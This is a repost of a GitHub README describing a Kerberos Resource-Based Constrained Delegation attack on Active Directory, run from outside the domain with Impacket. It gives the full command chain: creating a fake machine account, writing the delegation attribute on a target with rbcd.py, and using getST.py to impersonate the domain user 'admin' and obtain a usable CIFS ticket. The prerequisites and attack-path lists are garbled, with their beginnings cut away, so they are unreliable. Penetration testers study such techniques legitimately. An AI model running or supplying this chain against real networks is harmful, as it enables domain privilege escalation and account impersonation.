This repo is about a practical attack against Kerberos Resource-Based Constrained Delegation in a Windows Active Directory Domain.
The difference from other common implementations is that we are launching the attack from outside of the Windows Domain, not from a domain-joined (usually Windows) computer.
The attack is implemented using only Python3 Impacket (and its dependencies). Tested on Arch with up-to-date Impacket (0.9.21 as of writing).
In summary, without any deep details, the attack targets a domain computer, more precisely the service principals related to the target domain computer.
What we need here as prerequisites:
msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer domain object)
MachineAccountQuota)
The attack path at a very high level:
msDS-AllowedToActOnBehalfOfOtherIdentity property of the target
Advantage:
The common toolsets for this attack operate on a domain-joined Windows computer using:
abusing msDS-AllowedToActOnBehalfOfOtherIdentity
This implementation uses pure Impacket from outside the Domain.
Using the addcomputer.py example from Impacket, let's create a fake computer (called evilcomputer):
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0
The script rbcd.py found here in the repo adds the related security descriptor of the newly created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer.
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0
The script makes heavy use of the Python classes in the ntlmrelayx.py Impacket example. For help and an example, call the script without any options.
Now everything is ready for abusing the Constrained Delegation by an S4U2Self query and getting an impersonated Service Ticket for the target computer, with the getST.py Impacket example script:
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS
The above command fetches a CIFS Service Ticket on behalf of the targeted domain user admin and stores it in the file admin.ccache.
After adding the file path to the KRB5CCNAME variable, the ticket is usable for Kerberos clients.
export KRB5CCNAME=`pwd`/admin.ccache
klist
For information about abusing Resource-Based Constrained Delegation:
And one of the most detailed presentations about Kerberos Attacks:
More: https://github.com/tothi/rbcd-attack
The post Rbcd-Attack – Kerberos Resource-Based Constrained Delegation Attack From Outside Using Impacket appeared first on Hakin9 – IT Security Magazine.